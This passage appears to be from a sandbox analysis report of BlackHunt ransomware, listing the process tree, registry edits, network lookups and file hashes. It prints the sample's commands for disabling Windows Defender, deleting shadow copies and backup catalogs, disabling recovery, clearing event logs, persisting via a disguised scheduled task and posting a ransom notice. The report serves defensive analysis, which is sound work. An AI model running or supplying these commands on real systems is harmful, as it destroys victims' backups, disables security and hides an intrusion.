PID 2872 wrote to memory of 296 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2564 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2564 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2564 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2564 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2848 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2848 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2848 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2848 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 3044 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 3044 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 3044 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 3044 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2568 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2568 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2568 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2568 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2796 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\system32\vssadmin.exe
PID 2872 wrote to memory of 2796 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\system32\vssadmin.exe
PID 2872 wrote to memory of 2796 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\system32\vssadmin.exe
PID 2872 wrote to memory of 2796 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\system32\vssadmin.exe
PID 2872 wrote to memory of 2108 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2108 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2108 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2108 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2052 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2052 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2052 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2052 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2176 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2176 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2176 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2176 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 304 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 304 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 304 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 304 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe

System policy modification

evasion
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D F:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D M:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Application

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\taskkill.exe

taskkill /IM mshta.exe /f

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Setup

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security /e:false

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl System

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 5

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\notepad.exe

notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

C:\ProgramData\#BlackHunt_Private.key

MD5 868458415e80d77143a5d7deed140fef
SHA1 bd873b33c1ea3ef1c8fcaba583fd42e6bf0c6cb2
SHA256 6f49a210dd80cdd7b9ddba7b078a4b2c7b3b40dbf6f75ec7048688d2e3124724
SHA512 903b8d5eddf8fc6aaf7f2d163114c54c9b86fb957150abfb3beca44eef23dadc63990afa592b3f092f0235315c663c6e651a9800d7ff79e74699f7ab48dc50eb

C:\ProgramData\#BlackHunt_ReadMe.hta

MD5 e309e86aa475bf9ab6d9ec368d40fe5a
SHA1 3db62b6572867604cd091a6c518c4458308d002e
SHA256 39c0d064e4419607fa2a3b96691440bb9613e7cf28be9476dbe6c644f07a13d2
